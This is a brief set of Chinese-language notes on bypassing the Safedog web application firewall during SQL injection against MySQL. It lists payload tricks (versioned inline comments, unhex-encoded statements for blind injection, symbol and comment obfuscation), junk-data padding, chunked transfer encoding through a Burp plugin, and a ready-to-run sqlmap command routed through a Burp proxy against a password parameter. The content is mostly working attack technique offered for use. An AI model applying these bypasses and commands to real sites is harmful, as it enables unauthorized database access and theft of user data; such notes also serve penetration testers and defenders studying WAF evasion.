安全狗
- /*!11440order*/
11440是mysql的版本号
40101
40103
40014 - unhex("hex编码后的语句")
mysql支持hex编码后的语句 - 针对盲注
and!!!if - /*//*/
/*两个符号或者特殊字符*/ 例如单个字符的1/2
垃圾数据填充
- post前提
python3 generationData_bypass.py 1000 > bypass.txt
du -h bypass.txt 看文件大小 - 利用burp插件chunked-coding-converter.0.2.1.jar进行分块传输
并在每个分块后面添加垃圾数据
1-5 5-10 - sqlmap和burp联动
sqlmap -r 1.txt --proxy=http://192.168.1.6:8080 --batch --technique U -p password --dbms=mysql
burp监听192.168.1.6:8080即可